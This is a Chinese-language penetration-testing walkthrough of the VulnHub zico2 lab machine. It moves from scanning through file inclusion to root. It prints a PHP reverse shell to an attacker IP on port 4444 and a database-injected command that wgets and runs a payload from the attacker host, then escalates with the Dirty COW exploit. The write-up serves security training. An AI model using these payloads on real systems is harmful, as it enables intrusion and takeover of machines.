kali滲透綜合靶機(五)--zico2靶機
靶機地址:https://www.vulnhub.com/series/zico2,137/#modal210download
一、主機發現
1.netdiscover -i eth0 -r 192.168.10.0/24

二、端口掃描
1.masscan --rate=10000 -p 0-65535 192.168.10.158

三、端口服務識別
1. nmap -sV -T4 -O 192.168.10.157 -p 22,80,111,60830

四、漏洞發現
1.訪問http://192.168.10.158,發現http://192.168.10.158/view.php?page=tools.htm可能存在文件包含漏洞

2.測試是否存在文件包含漏洞,下圖說明存在存在文件包含漏洞

3.掃描網站目錄
dirb http://192.168.10.158

4.測試數據庫是否可寫內容,在數據庫插入<? Phpinfo();?>,然后結合文件包含

然后結合文件包含

5.在攻擊端寫反彈腳本,然后在目標數據庫中寫入一段代碼加載位於攻擊端的代碼,結合文件包含,然后在攻擊端開啟監聽
攻擊端代碼:
<?php
$sock=fsockopen("192.168.10.151",4444);exec("/bin/sh -i <&3 >&3 2>&3");
?>
目標數據庫插入代碼:
<?php system("wget 192.168.10.151/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>



6.新建一個終端
python -c 'import pty;pty.spawn("/bin/bash")'

7.下載攻擊端的dirty.c腳本

8. 然后編譯並運行,然后切換firefart賬戶,獲得管理員權限

總結:
1.信息收集
2.文件包含
3.臟牛提權
